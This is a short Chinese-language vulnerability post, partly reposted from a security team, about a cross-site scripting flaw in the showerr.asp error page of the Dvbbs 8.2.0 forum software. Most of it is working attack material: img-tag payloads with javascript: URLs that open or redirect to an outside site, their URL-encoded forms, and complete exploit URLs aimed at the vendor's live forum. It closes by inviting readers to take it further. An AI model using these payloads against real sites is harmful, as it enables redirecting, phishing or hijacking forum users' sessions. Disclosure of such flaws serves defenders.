Dvbbs Version 8.2.0 错误页面造成的跨站攻击
文章部分转载自:Tosec信息安全团队 (www.Tosec.cn)
影响版本:Dvbbs Version 8.2.0 及以下所有版本
漏洞页面:showerr.asp
简要描述:页面对action数据进行直接输出,却没有对其进行严格的过滤操作导致跨站
测试站点:http://bbs.dvbbs.net/
测试语句:
<img src=”javascript:window.open(‘//blog.tkbbs.com’)” alt=”" /> <img src=”javascript:window.location=” alt=”" /> 语句编写如下 注意语句后面还有个空格 编码后分别为
%3Cimg+src%3Djavascript%3Awindow.open%28%27%2F%2Fblog.tkbbs.com%27%29+
%3Cimg+src%3Djavascript%3Awindow.location%3D%22%2F%2Fblog.tkbbs.com%22+
用+代替原作者提出的%20更好点。。
提交路径如下
http://bbs.dvbbs.net/showerr.asp?BoardID=0&ErrCodes=60&action=%3Cimg+src%3Djavascript%3Awindow.open%28%27%2F%2Fblog.tkbbs.com%27%29+
http://bbs.dvbbs.net/showerr.asp?BoardID=0&ErrCodes=60&action=%3Cimg+src%3Djavascript%3Awindow.location%3D%22%2F%2Fblog.tkbbs.com%22+
更多的就仁者见仁智者见智了。。。
Recent Comments